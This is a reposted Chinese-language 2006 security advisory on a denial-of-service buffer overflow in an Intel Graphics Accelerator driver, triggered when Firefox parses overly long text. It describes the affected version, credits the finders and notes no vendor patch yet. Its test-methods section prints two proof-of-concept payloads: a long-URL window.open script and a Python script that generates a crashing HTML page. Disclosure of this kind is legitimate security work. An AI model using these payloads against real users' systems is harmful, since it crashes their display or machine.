[转载]Intel图形加速器驱动远程拒绝服务漏洞
信息来源:中联绿盟信息技术发布日期:2006-01-03
更新日期:2006-01-03
受影响系统:
Intel Graphics Accelerator driver 6.14.10.4308
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 16127
Intel图形加速器可在Microsoft Windows系统中提高图形显示的性能。
Intel图形加速器驱动中存在远程拒绝服务漏洞。
如果在Mozilla Firefox中试图解析超长文本的话,就会触发缓冲区溢出,导致Windows显示管理器崩溃。在Windows XP上这个漏洞仅会导致显示管理器崩溃,但在Windows 2000 server上会导致蓝屏死机。
<*来源:Casiamo ([email]casiamo@gmail.com[/email])
Sumit Siddharth ([email]sumit.siddharth@gmail.com[/email])
链接:[url]http://marc.theaimsgroup.com/?l=full-disclosure&m=113619729531199&w=2[/url]
[url]http://marc.theaimsgroup.com/?l=full-disclosure&m=113628207818847&w=2[/url]
[url]http://marc.theaimsgroup.com/?l=full-disclosure&m=113628806804318&w=2[/url]
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1
<script>window.open("[url]http://aa...[/url]");</script>
重复“a”大约53000次。
2
html = open("firefox.html", "w")
buff = 'A' * 50000
html.write("<html><head>\n"
"<script type=\"text/javascript\">\n"
"function bookmarksite(title, url){\n"
"if (document.all)\n"
"window.external.AddFavorite(url, title);\n"
"else if (window.sidebar)\n"
"window.sidebar.addPanel(title, url, \"\")}\n"
"</script></head>\n"
"<body onload=\"javascript:bookmarksite('"+buff+"',
'[url]http://www.mozilla.org[/url]')\"
>\n"
"</body></html>")
html.close()
建议:
--------------------------------------------------------------------------------
厂商补丁:
Intel
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
[url]http://support.intel.com/support/graphics/[/url]
页:
[1]